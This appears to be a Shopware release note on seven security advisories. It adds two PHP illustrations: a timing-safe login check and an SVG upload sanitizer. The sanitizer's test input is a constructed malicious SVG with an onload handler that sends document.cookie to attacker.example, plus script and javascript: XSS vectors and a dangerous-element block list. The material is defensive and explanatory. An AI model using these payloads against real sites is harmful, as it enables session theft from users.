This release includes 7 security fixes; teams running internet-exposed Shopware deployments should review the advisories below and upgrade.
Summary
A mixed release that addresses seven GitHub security advisories, among them https://github.com/shopware/shopware/security/advisories/GHSA-gv8p-48fr-4fxg, https://github.com/shopware/shopware/security/advisories/GHSA-8v9p-g828-v98f, and https://github.com/shopware/shopware/security/advisories/GHSA-7w52-7jvm-m9vw.
Changes in this release
| Type | Severity | Summary | CVE |
|---|---|---|---|
| Security | Medium | GHSA-gv8p-48fr-4fxg fixes privilege escalation via a Sync API integration admin-flag bypass. | — |
| Security | Medium | GHSA-8v9p-g828-v98f mitigates admin account takeover via user recovery hash exposure. | — |
| Security | Medium | GHSA-7w52-7jvm-m9vw prevents a timing attack on the admin panel that allowed enumeration of administrator usernames. | — |
| Security | Medium | GHSA-v39m-97p8-gqg7 resolves privilege escalation where a non-admin user with the user:create ACL could create admin accounts. | — |
| Security | Medium | GHSA-f8q6-3g5w-jjr6 fixes an Admin API ACL bypass in the order state transition endpoints. | — |
| Security | Medium | GHSA-9v5m-39wh-5chq prevents unauthorized payment triggering for foreign orders via /store-api/handle-payment. | — |
| Security | Medium | GHSA-xvhc-gm7j-mhmc addresses stored XSS via SVG file upload caused by missing SVG sanitization. | — |
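GHSA-7w52-7jvm-m9vw is a username-enumeration timing side channel: a login handler that returns as soon as the username lookup fails is measurably faster than one that proceeds to verify a password hash. The following PHP script is an added illustration of that class of bug and its standard mitigation; it is not Shopware's login code or its actual fix, and the in-memory user store, function names and the dummy-hash approach are this example's own assumptions.

```php
<?php
declare(strict_types=1);

// Constructed in-memory user store (username => password hash). A real
// system would do a database lookup here; the timing argument is the same.
$users = [
    'admin' => password_hash('correct horse battery staple', PASSWORD_DEFAULT),
];

// Hash of a throwaway secret, computed once at bootstrap with the same cost
// parameters as real hashes, so the "unknown user" path can do the same
// amount of work as the "known user, wrong password" path.
$dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);

// Vulnerable pattern: an unknown username short-circuits before any hash
// work, so it fails in microseconds while a known one takes tens of
// milliseconds. The response time therefore reveals which usernames exist.
function loginLeaky(array $users, string $username, string $password): bool
{
    if (!isset($users[$username])) {
        return false; // fast path, no password_verify() executed
    }
    return password_verify($password, $users[$username]);
}

// Hardened pattern: always run password_verify(), against the dummy hash
// when the user does not exist, and only then combine the two facts. Both
// outcomes now cost one hash verification and yield the same generic failure.
function loginConstantWork(array $users, string $username, string $password, string $dummyHash): bool
{
    $exists = isset($users[$username]);
    $hash   = $exists ? $users[$username] : $dummyHash;
    $ok     = password_verify($password, $hash);
    return $exists && $ok;
}

// Median wall-clock time of $fn over $rounds calls, in microseconds.
function medianMicros(callable $fn, int $rounds = 9): float
{
    $samples = [];
    for ($i = 0; $i < $rounds; $i++) {
        $t0 = hrtime(true);
        $fn();
        $samples[] = (hrtime(true) - $t0) / 1000;
    }
    sort($samples);
    return $samples[intdiv($rounds, 2)];
}

printf("leaky:    known=%9.1fus  unknown=%9.1fus\n",
    medianMicros(fn() => loginLeaky($users, 'admin',  'wrong-password')),
    medianMicros(fn() => loginLeaky($users, 'nobody', 'wrong-password')));
printf("hardened: known=%9.1fus  unknown=%9.1fus\n",
    medianMicros(fn() => loginConstantWork($users, 'admin',  'wrong-password', $dummyHash)),
    medianMicros(fn() => loginConstantWork($users, 'nobody', 'wrong-password', $dummyHash)));
```

Run it with `php timing.php` (PHP 7.3 or later for `hrtime()`): the leaky variant shows a gap of several orders of magnitude between the known and unknown username, while the hardened variant shows two comparable bcrypt-sized timings. The same "do the expensive work regardless, then decide" shape applies to any endpoint that looks up an account by identifier, including password-recovery requests, which should also answer with an identical message whether or not the account exists.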
Full changelog
See the UPGRADE.md for all important technical changes.
- GHSA-gv8p-48fr-4fxg - Privilege Escalation via Sync API Integration Admin Flag Bypass
- GHSA-8v9p-g828-v98f - Admin Account Takeover via User Recovery Hash Exposure
- GHSA-7w52-7jvm-m9vw - Timing-attack on admin panel allowing enumeration of administrator usernames
- GHSA-v39m-97p8-gqg7 - Privilege escalation: non-admin user with user:create ACL can create admin accounts
- GHSA-f8q6-3g5w-jjr6 - Admin API ACL Bypass in Order State Transition Endpoints
- GHSA-9v5m-39wh-5chq - Unauthorized Payment Trigger for Foreign Orders via /store-api/handle-payment
- GHSA-xvhc-gm7j-mhmc - Stored XSS via SVG file upload - no SVG sanitization
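The last advisory, GHSA-xvhc-gm7j-mhmc, is stored XSS through uploaded SVG files: SVG is XML that can carry `<script>`, event-handler attributes, `javascript:` links and HTML via `<foreignObject>`, so it must be sanitized (or served as an attachment from a separate origin) before being rendered inline. The following PHP sanitizer is an added example of the server-side part of that fix; it is not Shopware's media code or its actual patch, and the constant names, the element block-list and the sample upload are this example's own constructions.

```php
<?php
declare(strict_types=1);

// Requires PHP >= 8.0 with ext-dom (libxml). All names below are this example's own.
const SVG_NS = 'http://www.w3.org/2000/svg';

// Elements that execute script or embed arbitrary HTML, matched
// case-insensitively on the local name in any namespace.
const DANGEROUS_ELEMENTS = ['script', 'foreignobject', 'iframe', 'embed', 'object'];

// CSS that reaches outside the document: url(...) not pointing at a local
// #fragment, and the legacy expression() script hook.
const UNSAFE_CSS = '/url\s*\(\s*[\'"]?\s*(?!#)|expression\s*\(/i';

function isSafeHref(string $value): bool
{
    // Allow-list, so obfuscated schemes such as "java\tscript:" never have to
    // be recognised: only same-document references and inline raster images.
    if (str_starts_with($value, '#')) {
        return true;
    }
    return (bool) preg_match('#^data:image/(png|jpeg|gif|webp);base64,[A-Za-z0-9+/=]+$#', $value);
}

function sanitizeSvg(string $svg): string
{
    $prev = libxml_use_internal_errors(true);
    $dom  = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing. Never add
    // LIBXML_NOENT here: it enables entity substitution and with it XXE.
    $loaded = $dom->loadXML($svg, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$loaded || $dom->doctype !== null) {
        throw new InvalidArgumentException('Rejected: not well-formed XML, or carries a DOCTYPE');
    }
    $root = $dom->documentElement;
    if ($root->namespaceURI !== SVG_NS || $root->localName !== 'svg') {
        throw new InvalidArgumentException('Rejected: root element is not <svg>');
    }

    $xpath = new DOMXPath($dom);
    // Snapshot the live node list first: removing nodes while iterating it skips siblings.
    foreach (iterator_to_array($xpath->query('//*'), false) as $el) {
        $name = strtolower($el->localName);
        if (in_array($name, DANGEROUS_ELEMENTS, true)
            || ($name === 'style' && preg_match(UNSAFE_CSS, $el->textContent))) {
            $el->parentNode?->removeChild($el);
            continue;
        }
        foreach (iterator_to_array($el->attributes, false) as $attr) {
            $local = strtolower($attr->localName);
            $value = trim($attr->value);
            $drop = str_starts_with($local, 'on')                         // onload, onclick, ...
                || ($local === 'href' && !isSafeHref($value))             // href and xlink:href
                || ($local === 'style' && preg_match(UNSAFE_CSS, $value)); // remote url() in inline CSS
            if ($drop) {
                $el->removeAttributeNode($attr);
            }
        }
    }
    return $dom->saveXML();
}

// Constructed malicious upload exercising each stripped vector.
$upload = <<<'XML'
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="fetch('https://attacker.example/?c='+document.cookie)">
  <script>alert(document.domain)</script>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(1)"/></body></foreignObject>
  <a xlink:href="javascript:alert(1)"><text y="20">click me</text></a>
  <use href="#dot"/>
  <circle id="dot" r="10" style="fill:url(https://attacker.example/leak.svg#g)"/>
</svg>
XML;

echo sanitizeSvg($upload);
```

The output keeps the `<a>`, `<text>`, `<use href="#dot">` and `<circle>` elements but drops the `onload` handler, the `<script>` and `<foreignObject>` subtrees, the `javascript:` link and the remote `url()` style. Because the document is re-parsed and re-serialized by libxml rather than filtered with string replacements, entity-encoded or oddly cased payloads are normalized before the checks run. Sanitization is defence in depth; uploads should still be served with a restrictive `Content-Security-Policy` and, where inline rendering is not required, as `Content-Disposition: attachment` from an origin that holds no session cookies.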
About Shopware Community Edition
PHP based open source e-commerce software made in Germany.